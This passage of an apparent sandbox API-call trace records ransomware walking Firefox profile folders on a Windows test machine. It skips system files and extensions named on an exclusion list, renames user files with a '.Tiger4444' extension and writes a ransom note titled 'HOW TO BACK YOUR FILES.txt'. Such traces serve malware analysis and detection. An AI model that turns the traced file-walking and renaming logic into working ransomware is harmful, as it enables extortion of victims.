lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.351] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x421d9eea, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x421d9eea, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x839f0eb8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e88 [0051.351] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.351] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.351] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.351] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.351] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x421d9eea, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x421d9eea, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x839f0eb8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.351] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.351] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.351] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.351] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.351] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.351] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x839f0eb8, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x839f0eb8, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x839f0eb8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.351] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.351] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.351] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x839f0eb8, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x839f0eb8, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x839f0eb8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0051.352] FindClose (in: hFindFile=0xc72e88 | out: hFindFile=0xc72e88) returned 1 [0051.352] lstrcpyW (in: lpString1=0x30aebc2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.352] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.352] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0051.352] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.352] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.353] CloseHandle (hObject=0x260) returned 1 [0051.353] CloseHandle (hObject=0x2ac) returned 1 [0051.353] GetCurrentThreadId () returned 0xfa8 [0051.353] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc86f28 [0051.353] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome" [0051.353] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8e0d0 | out: hHeap=0xc50000) returned 1 [0051.353] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc86f20 | out: hHeap=0xc50000) returned 1 [0051.353] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome" [0051.353] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\" [0051.353] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.BFC0E91B00AE8A0620D3" [0051.353] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.355] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.358] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.359] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.359] CloseHandle (hObject=0x2ac) returned 1 [0051.359] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome") returned 98 [0051.359] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.359] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c2e4c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x246c9b2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x83a16379, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0051.359] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.359] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.359] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.360] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.360] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c2e4c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x246c9b2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x83a16379, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.360] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.360] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.360] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.360] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.360] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.360] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83a16379, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83a16379, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83a16379, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.360] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.360] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.360] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23c2e4c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x23c2e4c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x23c41d5, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x1d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".metadata", cAlternateFileName="METADA~1")) returned 1 [0051.360] lstrcmpiW (lpString1=".metadata", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.360] lstrcmpiW (lpString1=".metadata", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.360] lstrcmpiW (lpString1=".metadata", lpString2="Tiger4444.exe") returned -1 [0051.360] lstrcmpiW (lpString1=".metadata", lpString2=".") returned 1 [0051.360] lstrcmpiW (lpString1=".metadata", lpString2="..") returned 1 [0051.360] lstrcmpiW (lpString1=".metadata", lpString2="windows") returned -1 [0051.360] lstrcmpiW (lpString1=".metadata", lpString2="bootmgr") returned -1 [0051.360] lstrcmpiW (lpString1=".metadata", lpString2="pagefile.sys") returned -1 [0051.360] lstrcmpiW (lpString1=".metadata", lpString2="boot") returned -1 [0051.360] lstrcmpiW (lpString1=".metadata", lpString2="ids.txt") returned -1 [0051.360] lstrcmpiW (lpString1=".metadata", lpString2="NTUSER.DAT") returned -1 [0051.360] lstrcpyW (in: lpString1=0x30aeb6e, lpString2=".metadata" | out: lpString1=".metadata") returned=".metadata" [0051.360] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata", dwFileAttributes=0x0) returned 1 [0051.360] lstrlenW (lpString=".metadata") returned 9 [0051.360] lstrlenW (lpString="Tiger4444") returned 9 [0051.360] lstrcmpiW (lpString1=".metadata", lpString2="Tiger4444") returned -1 [0051.361] lstrlenW (lpString=".dll") returned 4 [0051.361] lstrcmpiW (lpString1="data", lpString2=".dll") returned 1 [0051.361] lstrlenW (lpString=".lnk") returned 4 [0051.361] lstrcmpiW (lpString1="data", lpString2=".lnk") returned 1 [0051.361] lstrlenW (lpString=".ini") returned 4 [0051.361] lstrcmpiW (lpString1="data", lpString2=".ini") returned 1 [0051.361] lstrlenW (lpString=".sys") returned 4 [0051.361] lstrcmpiW (lpString1="data", lpString2=".sys") returned 1 [0051.361] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0051.361] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.361] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14281406814) returned 1 [0051.361] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=29) returned 1 [0051.361] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0051.361] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0051.361] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x2c8 [0051.365] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0xbe0000 [0051.366] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc81d40 [0051.366] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0051.366] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.366] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0051.366] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0051.366] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0051.366] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.366] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0051.366] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14281924707) returned 1 [0051.366] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0051.366] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0051.366] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.366] CloseHandle (hObject=0x2c8) returned 1 [0051.366] CloseHandle (hObject=0x260) returned 1 [0051.366] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata.Tiger4444") returned 118 [0051.366] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata.tiger4444"), dwFlags=0x1) returned 1 [0051.367] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2409b53, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x2409b53, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x240aee0, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".metadata-v2", cAlternateFileName="METADA~2")) returned 1 [0051.367] lstrcmpiW (lpString1=".metadata-v2", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.367] lstrcmpiW (lpString1=".metadata-v2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.367] lstrcmpiW (lpString1=".metadata-v2", lpString2="Tiger4444.exe") returned -1 [0051.367] lstrcmpiW (lpString1=".metadata-v2", lpString2=".") returned 1 [0051.367] lstrcmpiW (lpString1=".metadata-v2", lpString2="..") returned 1 [0051.367] lstrcmpiW (lpString1=".metadata-v2", lpString2="windows") returned -1 [0051.367] lstrcmpiW (lpString1=".metadata-v2", lpString2="bootmgr") returned -1 [0051.367] lstrcmpiW (lpString1=".metadata-v2", lpString2="pagefile.sys") returned -1 [0051.367] lstrcmpiW (lpString1=".metadata-v2", lpString2="boot") returned -1 [0051.367] lstrcmpiW (lpString1=".metadata-v2", lpString2="ids.txt") returned -1 [0051.367] lstrcmpiW (lpString1=".metadata-v2", lpString2="NTUSER.DAT") returned -1 [0051.367] lstrcpyW (in: lpString1=0x30aeb6e, lpString2=".metadata-v2" | out: lpString1=".metadata-v2") returned=".metadata-v2" [0051.367] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata-v2", dwFileAttributes=0x0) returned 1 [0051.368] lstrlenW (lpString=".metadata-v2") returned 12 [0051.368] lstrlenW (lpString="Tiger4444") returned 9 [0051.368] lstrcmpiW (lpString1="tadata-v2", lpString2="Tiger4444") returned -1 [0051.368] lstrlenW (lpString=".dll") returned 4 [0051.368] lstrcmpiW (lpString1="a-v2", lpString2=".dll") returned 1 [0051.368] lstrlenW (lpString=".lnk") returned 4 [0051.368] lstrcmpiW (lpString1="a-v2", lpString2=".lnk") returned 1 [0051.368] lstrlenW (lpString=".ini") returned 4 [0051.368] lstrcmpiW (lpString1="a-v2", lpString2=".ini") returned 1 [0051.368] lstrlenW (lpString=".sys") returned 4 [0051.368] lstrcmpiW (lpString1="a-v2", lpString2=".sys") returned 1 [0051.368] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata-v2" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata-v2"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0051.368] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.368] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14282131261) returned 1 [0051.368] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=42) returned 1 [0051.368] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0051.368] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71730 [0051.368] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x330, lpName=0x0) returned 0x2c8 [0051.370] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x330) returned 0xbe0000 [0051.371] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc81d40 [0051.371] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0051.371] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.371] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0051.371] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0051.371] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0051.371] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.371] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0051.371] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14282427016) returned 1 [0051.371] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0051.371] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71730 | out: hHeap=0xc50000) returned 1 [0051.371] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.371] CloseHandle (hObject=0x2c8) returned 1 [0051.371] CloseHandle (hObject=0x260) returned 1 [0051.371] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata-v2.Tiger4444") returned 121 [0051.371] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata-v2" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata-v2"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata-v2.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\.metadata-v2.tiger4444"), dwFlags=0x1) returned 1 [0051.372] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x246c9b2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x7d09b9f, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xeffbe54, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="idb", cAlternateFileName="")) returned 1 [0051.372] lstrcmpiW (lpString1="idb", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.372] lstrcmpiW (lpString1="idb", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.372] lstrcmpiW (lpString1="idb", lpString2="Tiger4444.exe") returned -1 [0051.372] lstrcmpiW (lpString1="idb", lpString2=".") returned 1 [0051.372] lstrcmpiW (lpString1="idb", lpString2="..") returned 1 [0051.372] lstrcmpiW (lpString1="idb", lpString2="windows") returned -1 [0051.372] lstrcmpiW (lpString1="idb", lpString2="bootmgr") returned 1 [0051.372] lstrcmpiW (lpString1="idb", lpString2="pagefile.sys") returned -1 [0051.372] lstrcmpiW (lpString1="idb", lpString2="boot") returned 1 [0051.372] lstrcmpiW (lpString1="idb", lpString2="ids.txt") returned -1 [0051.372] lstrcmpiW (lpString1="idb", lpString2="NTUSER.DAT") returned -1 [0051.372] lstrcpyW (in: lpString1=0x30aeb6e, lpString2="idb" | out: lpString1="idb") returned="idb" [0051.372] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc86ba0 [0051.372] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xce) returned 0xc77fc0 [0051.372] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc86ba8 | out: ListHead=0xc66828, ListEntry=0xc86ba8) returned 0xc5a728 [0051.372] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x246c9b2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x7d09b9f, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xeffbe54, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="idb", cAlternateFileName="")) returned 0 [0051.372] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0051.373] lstrcpyW (in: lpString1=0x30aeb6e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.373] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\chrome\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.373] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 